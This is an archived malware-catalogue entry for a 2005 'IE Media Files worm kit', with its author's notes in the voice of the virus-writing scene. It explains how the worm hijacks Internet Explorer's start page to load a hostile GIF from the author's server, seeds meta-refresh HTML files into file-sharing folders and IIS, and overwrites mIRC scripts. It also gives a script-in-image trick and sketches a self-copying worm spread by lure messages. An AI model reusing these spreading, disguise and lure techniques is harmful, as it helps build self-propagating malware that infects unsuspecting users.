.: IE Media Files worm kit :.

Released 16 years, 8 months ago. Dec 2005

By dav

Additional Details

  • Coded by: dav
  • Version: IE Media Files worm kit
  • Released date: Dec 2005, 16 years, 8 months ago.
  • Coded in: Delphi
  • Family: IE Media Files worm kit
  • Category: Remote Access

MegaSecurity Notes

tested on Windows XP
February 17, 2007

Author Words

Intro

Sven Vetsch found a cross site scripting vulnerability at Microsoft Internet Explorer.
Its possible to run arbitrary script code. The problem lies in the handling of the content of such files. 
In the first place the usual file header (e.g. Gif) is provided. The remaining content of the file 
could be usual html data -> + javascript/visual basic script (VBS, ActiveX must be enabled!)
 Worm Description

My w0rm defines a new IE start page. If the victim starts IE, IE will always load the w0rm.gif 
(on my webserver) -> w0rm start routine! 
Unfortunately the gif bug only works when IE streams the gif from a web server over HTTP or HTTPS!
The malicious gif can't be executed locally or included in other html pages. Therefore i had to write 
a new spreading technique. It makes no sense to drop a copy of the w0rm. So I decided that my w0rm 
creates html files on the victim machine with one meta tag line ->
	w.WriteLine "<meta http-equiv='refresh' content='0;URL=" & url & "'>" 
The idea is simple. Drop html files including redirection to our webserver and spread these html files 
over file sharing folders (kazaa, p2p) and IIS (if installed). Also my w0rm overwrites (if exist) the 
mirc script.ini with some new lines. Why no dcc spreading script? Simply because the chance is much higher
that the w0rm infects more machines by sending the link across irc instead of sending html files.




Malicious JPG, PDF, PNG, AVI, ...

Its possible to put/hide your w0rm in every file (jpg, gif, pdf, png, avi,...). I tried it and it works! (all IE)
Open your notepad and type:
	<script type="text/javascript">alert("the vx scene never dies!")</script>
Save it as *.jpg, *.pdf, ... ;) 
It isn't necessary to write the usual file header (e.g. Gif) in the first place!
Just put your js/vbs c0de in such a file, upload and... :).



New Idea

I guess you noticed that my sample script is not exactly a real w0rm but, 
we could write a w0rm with the following features:

- the w0rm drops a copy of itself as jpg, gif, pdf, png, avi, ... and a binary version of 
a simple webserver in itself (with chr())
- spreading the hosts ip over mail?/irc/im?
  -> e.g. "hey buddy look at this :D, --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--"

dav

URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at sub7crew@protonmail.com, thank you in advance.